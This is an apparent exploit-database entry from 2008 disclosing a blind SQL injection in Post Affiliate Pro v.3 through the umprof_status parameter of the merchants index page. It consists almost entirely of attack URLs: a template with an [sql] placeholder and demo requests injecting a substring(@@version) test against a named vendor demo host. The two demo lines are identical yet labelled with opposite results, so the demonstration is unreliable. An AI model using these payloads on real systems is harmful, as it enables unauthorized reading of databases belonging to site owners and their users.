id: 4264
date: 11/26/2008
title: Post Affiliate Pro v.3 (umprof_status) Blind SQL Injection Vulnerability
author: XaDoS
cves: 

========================================================================
Post Affiliate Pro v.3 (umprof_status) Blind SQL Injection Vulnerability
========================================================================


[¦]  Post Affiliate Pro v.3 (index.php md) <= Blind $ql Injection

 
>©<

> AuToR: XaDoS
> B§g: Blind $ql inJection
> SIte vuln: http://www.qualityunit.com/postaffiliatepro/

>©<
 
 
[¦] ExPL0iT:
 
|: http://www.example.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=[sql] 
 
 [you must be merchants]

[¦] D?M0: 
 
|: http://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [NO°°]
 
|: http://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [y&$ ;-)] 
 



#  0day.today [2023-03-26]  #